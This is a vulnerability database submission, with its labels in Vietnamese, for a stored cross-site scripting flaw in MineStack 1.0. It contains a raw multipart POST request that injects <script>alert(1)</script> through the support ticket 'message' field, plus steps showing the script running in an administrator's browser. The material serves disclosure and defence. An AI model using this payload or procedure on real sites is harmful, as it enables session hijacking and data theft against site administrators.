Gửi #182497: MineStack 1.0 - Stored XSSthông tin

tiêu đề	MineStack 1.0 - Stored XSS
Mô tả	# Exploit Title: MineStack 1.0 - Stored XSS # Exploit Author: skalvin aka (CraCkEr) # Date: 14/07/2023 # Vendor: Bug Finder # Vendor Homepage: https://bugfinder.net/ # Software Link: https://bugfinder.net/product/minestack-a-cloud-mining-platform/10 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Description Allow Attacker to inject malicious code into website, give ability to steal sensitive information, manipulate data, and launch additional attacks. Path: /mineStack/user/ticket/create POST parameter 'message' is vulnerable to XSS ----------------------------------------------------------- POST /mineStack/user/ticket/create HTTP/2 Content-Disposition: form-data; name="subject" Anything -----------------------------20515916954165612239365932815 Content-Disposition: form-data; name="message" <script>alert(1)</script> ----------------------------------------------------------- ## Steps to Reproduce: 1. Login as a (Normal User) 2. Go to [Support Ticket] on this Path: https://website/mineStack/user/ticket 3. Click on [Create Ticket] on this Path: https://website/mineStack/user/ticket/create 4. Enter Any Subject 5. Inject your XSS Payload in [Message Box] 6. Click on [Submit] 7. When ADMIN visit [SUPPORT TICKETS] on this Path : https://website/mineStack/admin/tickets and Open the [New Pending Ticket] 8. XSS Will Fire and Executed on his Browser [-] Done
Người dùng	skalvin (UID 49463)
Đệ trình	13/07/2023 23:47 (cách đây 3 những năm)
Kiểm duyệt	21/07/2023 22:47 (8 days later)
Trạng thái	được chấp nhận
Mục VulDB	235161 [Bug Finder MineStack 1.0 Ticket /user/ticket/create Tin nhắn Tập lệnh chéo trang]
điểm	17

◂ Trước Tổng Quan Tiếp theo ▸

Interested in the pricing of exploits?

See the underground prices here!